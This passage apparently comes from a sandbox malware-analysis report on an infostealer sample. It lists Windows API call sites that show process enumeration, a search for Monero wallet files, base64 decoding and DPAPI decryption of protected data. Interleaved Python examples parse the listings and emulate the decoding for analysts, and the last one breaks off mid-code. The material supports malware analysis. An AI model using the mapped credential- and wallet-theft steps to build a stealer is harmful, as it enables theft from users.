                                        • CloseHandle.KERNEL32(00000000), ref: 007C9987
                                        • CloseHandle.KERNEL32(007B9FDE), ref: 007C9993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /:?$?g]$a|G$a|G$g0~|$pr/$s]+$wUn
                                        • API String ID: 0-2382928104
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,007D05B7), ref: 007C7D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007C7D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 007C7D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007C7DF2
                                        • LocalFree.KERNEL32(00000000), ref: 007C7EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,007D0D79), ref: 007BE5A2
                                        • StrCmpCA.SHLWAPI(?,007D15F0), ref: 007BE5F2
                                        • StrCmpCA.SHLWAPI(?,007D15F4), ref: 007BE608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
                                        • LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: >O{
                                        • API String ID: 4291131564-1635969782
                                        • Opcode ID: f7f7302edc86d3b66e422db74606128b44dac5eda2c9d8874f1c9e6617ce32da
                                        • Instruction ID: 44c7c7e3d2de1eb3673a5a7a1cd92698a04e9a2a4aac151fc6202f27f4a6e908
                                        • Opcode Fuzzy Hash: f7f7302edc86d3b66e422db74606128b44dac5eda2c9d8874f1c9e6617ce32da
                                        • Instruction Fuzzy Hash: 94119074640308AFEB11CFA4CC95FAA77B5FB89B10F208458F9199B290C7B6A941CB50
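The function entry above shows the idiom that recurs throughout this listing: the same API called twice with identical arguments (here CryptStringToBinaryA at 007BA23F and 007BA27A, with a LocalAlloc in between), where the first call only reports the required buffer size. Spotting that pattern, and matching an ordered API sequence against a function's call list, is easier once the plugin's "APIs" lines are parsed into structured records. The following is an added example, not part of the report or of the Joe Sandbox plugin: a small parser for the `api.MODULE(args), ref: address` line format, fed with the four lines of this function copied as constructed input. The line format is taken from the lines as printed here; the `matches_signature` and `repeated_calls` helpers are this example's own triage primitives, not anything the plugin provides.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

# Constructed input: the "APIs" listing of the function at 007BA23F, copied
# from this report in the form the Joe Sandbox IDA plugin prints it.
SAMPLE_LISTING = """\
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
• LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
• LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
"""

# One listing line: "<api>.<module>(<args>), ref: <8 hex digits>".
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# An argument is a resolved constant, a verbatim inline string, or "?" (unresolved).
Arg = Union[int, str, None]


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[Arg, ...]
    ref: int  # address of the call site in the unpacked image (base 007B0000)


def parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token  # data the plugin printed verbatim, e.g. ">O{"


def parse_listing(text: str) -> List[ApiCall]:
    """Turn the plugin's API lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = tuple(parse_arg(t) for t in raw.split(",")) if raw else ()
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def call_sequence(calls: List[ApiCall]) -> List[str]:
    return [f"{c.module}!{c.api}" for c in calls]


def matches_signature(calls: List[ApiCall], signature: List[str]) -> bool:
    """Ordered-subsequence match: every API in `signature` occurs in the
    listing in that order; unrelated calls may sit between them."""
    remaining = iter(c.api for c in calls)
    return all(api in remaining for api in signature)


def repeated_calls(calls: List[ApiCall]) -> List[Tuple[int, int]]:
    """Pairs of call sites where the same API is invoked again with identical
    arguments: the size-query-then-fill idiom seen at 007BA23F / 007BA27A."""
    first_seen = {}
    pairs = []
    for c in calls:
        key = (c.module, c.api, c.args)
        if key in first_seen:
            pairs.append((first_seen[key], c.ref))
        else:
            first_seen[key] = c.ref
    return pairs


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    print(" -> ".join(call_sequence(parsed)))
    for first, second in repeated_calls(parsed):
        print(f"size query at {first:08X}, buffer filled at {second:08X}")
```

Feeding every function entry of the report through `parse_listing` and `matches_signature` is a quick way to locate, for instance, all functions that decode data and immediately pass it to a string builder, without re-reading each entry by hand.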
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: EA~~$N%E$^+E$^lv${=_
                                        • API String ID: 0-3001190425
                                        • Opcode ID: 527916e1cef697712f7355ca09ecf263d150847a35bef7ccfba4b87458b8371e
                                        • Instruction ID: 4172b155e1c428ae40e2daf633edcd50c0192d0d53ca21ac3b89b72488bd03dc
                                        • Opcode Fuzzy Hash: 527916e1cef697712f7355ca09ecf263d150847a35bef7ccfba4b87458b8371e
                                        • Instruction Fuzzy Hash: 95B218F360C6049FE304AE2DEC8567AFBE9EBD4320F16863DE6C4C7744EA3558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 5~!$?O5$D9?$`+{}$z^/~
                                        • API String ID: 0-373533715
                                        • Opcode ID: 3399998ba0f61c29ca76a1ab22f2ff58723c6f853c5ed289b43fa5603049dbf6
                                        • Instruction ID: 4dcc714600e67874384dde41e1cef53156d45aa8783d5f6a559c90e4ae8c0f3c
                                        • Opcode Fuzzy Hash: 3399998ba0f61c29ca76a1ab22f2ff58723c6f853c5ed289b43fa5603049dbf6
                                        • Instruction Fuzzy Hash: 41B2F6F36086049FE304AE2DEC8567AFBE5EFD4720F1A892DE6C4C7744EA3558058692
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *1n$0fCw$3w$4%7"$|}x
                                        • API String ID: 0-304112365
                                        • Opcode ID: 9190fee7dd63454e995546c7ed4ee62d26711084da25ad760c846aee538f2743
                                        • Instruction ID: 9109503a42757a7d9a8f1c279b3f24900c27d7f1f21bfddff7295871564d9231
                                        • Opcode Fuzzy Hash: 9190fee7dd63454e995546c7ed4ee62d26711084da25ad760c846aee538f2743
                                        • Instruction Fuzzy Hash: 7AB2D4F3A0C200AFE7046E2DEC8567ABBE5EB94720F16493DE6C5C7340E67598418797
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: 01b65de4ea88c228c13c6719d78c441e6711ad605a64f3b7729e7f55b6f661d1
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: 67417D12E19BD9C5CB058B7444A02EEBFB27FD6210F6D42AAC49D5F383C774418AD3A5
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007BC971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007BC97C
                                        • lstrcat.KERNEL32(?,007D0B47), ref: 007BCA43
                                        • lstrcat.KERNEL32(?,007D0B4B), ref: 007BCA57
                                        • lstrcat.KERNEL32(?,007D0B4E), ref: 007BCA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 58f4627cc7c869d0703bb8170424c47c062293732a2e3569345addd57bfb54a9
                                        • Instruction ID: 41c231c2a2306323c856ad36a3980e4d4e4fada61f433ed8aef2046b76bf09f6
                                        • Opcode Fuzzy Hash: 58f4627cc7c869d0703bb8170424c47c062293732a2e3569345addd57bfb54a9
                                        • Instruction Fuzzy Hash: DB4142B590821EDBDB10CF94DD89BFEB7B8BB44744F1081A9F509A7280D7749A84CF91
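Every CryptStringToBinaryA call in this listing (007BA23F, 007BA27A, 007BC97C) passes dwFlags = 00000001, which is CRYPT_STRING_BASE64, and the CryptBinaryToStringA at 007C9050 further down passes 40000001, i.e. CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF. The pair at 007BA23F / 007BA27A is the size-query-then-fill idiom (first call with a NULL output buffer, LocalAlloc with LMEM_ZEROINIT = 00000040, second call into the buffer). To replay that decoding on strings lifted from the memory dump without a Windows box, the following added example (not code from the report, the plugin, or the malware) emulates the CRYPT_STRING_BASE64 behaviour of both APIs, including the line-break handling that CRYPT_STRING_NOCRLF switches off. It makes no claim about any further decryption layer the sample may apply after base64; the inputs are constructed.

```python
import base64
import binascii
import re
from typing import Optional, Tuple

CRYPT_STRING_BASE64 = 0x00000001  # dwFlags at 007BA23F, 007BA27A and 007BC97C
CRYPT_STRING_NOCRLF = 0x40000000  # OR'd into the flags at 007C9050 (0x40000001)
LMEM_ZEROINIT = 0x00000040        # uFlags of the LocalAlloc at 007BA251

_WHITESPACE = re.compile(r"[ \t\r\n]+")


def crypt_string_to_binary(text: str, flags: int,
                           buffer_size: Optional[int] = None) -> Tuple[bool, int, Optional[bytes]]:
    """Emulate CryptStringToBinaryA for CRYPT_STRING_BASE64.

    buffer_size=None stands for pbBinary == NULL (size query only).
    Returns (success, required_size, data); data is only filled in when a
    buffer of at least required_size was supplied. Whitespace between base64
    characters is skipped like the real API does; anything outside the base64
    alphabet fails the call (ERROR_INVALID_DATA)."""
    if flags & 0xFF != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is emulated here")
    try:
        decoded = base64.b64decode(_WHITESPACE.sub("", text), validate=True)
    except binascii.Error:
        return False, 0, None
    if buffer_size is None:
        return True, len(decoded), None
    if buffer_size < len(decoded):
        return False, len(decoded), None  # ERROR_MORE_DATA
    return True, len(decoded), decoded


def crypt_binary_to_string(data: bytes, flags: int) -> str:
    """Emulate CryptBinaryToStringA for CRYPT_STRING_BASE64: a CRLF after every
    64 output characters and after the last line, unless CRYPT_STRING_NOCRLF
    is set, in which case the output is one unbroken line."""
    if flags & 0xFF != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is emulated here")
    encoded = base64.b64encode(data).decode("ascii")
    if flags & CRYPT_STRING_NOCRLF:
        return encoded
    return "".join(encoded[i:i + 64] + "\r\n" for i in range(0, len(encoded), 64))


def decode_like_sample(text: str) -> Optional[bytes]:
    """The control flow of the function at 007BA23F: size query, allocate a
    zeroed buffer of that size, decode into it, free it after use."""
    ok, size, _ = crypt_string_to_binary(text, CRYPT_STRING_BASE64)          # 007BA23F
    if not ok:
        return None
    # LocalAlloc(LMEM_ZEROINIT, size) at 007BA251 is just a buffer allocation here.
    ok, _, data = crypt_string_to_binary(text, CRYPT_STRING_BASE64, size)    # 007BA27A
    return data if ok else None                                              # LocalFree at 007BA28F


if __name__ == "__main__":
    # Constructed input standing in for a base64 string pulled from the dump.
    sample = "aGVsbG8g\r\nd29ybGQ="
    print(decode_like_sample(sample))
    print(repr(crypt_binary_to_string(b"A" * 49, CRYPT_STRING_BASE64)))
```

Two details matter when matching decoded output back to the dump: the size-query call returns the exact decoded length (so a LocalAlloc of that size leaves no room for a terminating NUL, which is why decoded strings in the dump are often followed immediately by other data), and a string that decodes to nothing sensible under plain base64 is a hint that the sample applies another transform on top, which this emulation does not attempt to guess.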
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007B72AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B72B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007B72E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007B7304
                                        • LocalFree.KERNEL32(?), ref: 007B730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: df777f180eb617e2badc5cac7cee54ad1efb5135ad6cca7f9fd5d8dc721f0e46
                                        • Instruction ID: e1eac3138a353b7bf69edd14243a16b22f0a1029c4f86697e32eea796fe84bdb
                                        • Opcode Fuzzy Hash: df777f180eb617e2badc5cac7cee54ad1efb5135ad6cca7f9fd5d8dc721f0e46
                                        • Instruction Fuzzy Hash: C3011E75A44308BBDB14DFE4DC46FEE77B8EB44B00F204555FB05AB2C0D6B0AA419BA5
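The entry above is the DPAPI decryption routine: a 0x400-byte heap buffer, CryptUnprotectData with dwFlags = 00000001 (CRYPTPROTECT_UI_FORBIDDEN, so the call fails quietly instead of prompting), then WideCharToMultiByte into that buffer, which tells you the plaintext this function expects is a UTF-16 string rather than raw key bytes (an inference from the listed calls; the report does not say which protected store it reads). Decryption can only happen in the victim's user context, but an investigator who recovers such a blob from disk or memory can still learn which master key it needs. The following added example, not code from the report or from Stealc, parses the DPAPI blob header that CryptProtectData emits: it checks the provider GUID and extracts the master-key GUID, which names the file under %APPDATA%\Microsoft\Protect\<SID>\ required for offline decryption with tooling such as impacket's dpapi.py. The blob layout and CALG_* identifiers are the public DPAPI format; the sample blob is constructed by the example itself, not taken from this sample.

```python
import struct
import uuid
from typing import Dict, Tuple

# Provider GUID found at offset 4 of every CryptProtectData blob.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_UI_FORBIDDEN = 0x00000001  # dwFlags at 007B72E1
ALG_NAMES = {
    0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512",
}


def _u32(buf: bytes, off: int) -> Tuple[int, int]:
    return struct.unpack_from("<I", buf, off)[0], off + 4


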